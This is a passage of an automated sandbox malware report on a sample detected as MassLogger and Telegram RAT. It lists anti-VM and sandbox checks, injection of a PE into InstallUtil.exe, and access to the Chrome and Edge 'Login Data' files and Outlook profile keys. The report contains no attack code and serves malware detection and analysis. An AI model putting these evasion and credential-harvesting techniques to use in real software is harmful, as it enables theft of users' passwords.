                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeMemory allocated: FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeMemory allocated: 4970000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory allocated: 18C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory allocated: 35A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1238Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1177Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 514Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 966Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99865s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7324Thread sleep count: 1238 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99623s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99473s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99343s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7324Thread sleep count: 1177 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99233s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99124s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -99014s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -98906s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -98768s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -98640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -98530s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7528Thread sleep count: 514 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -99843s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -99697s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -99583s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7528Thread sleep count: 966 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -99438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -99318s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -99125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -98989s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -98859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99865Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99623Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99473Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99233Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99014Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98768Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98530Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99697Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99583Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99318Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98989Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: wscript.exe, 00000009.00000002.1366030798.000001E60ED34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000002.00000002.2470166984.0000000000872000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2470235476.0000000001337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F7D008Jump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Activator.exe "C:\Users\user\AppData\Roaming\Activator.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeQueries volume information: C:\Users\user\Desktop\TtLlwb3ava.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeQueries volume information: C:\Users\user\AppData\Roaming\Activator.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
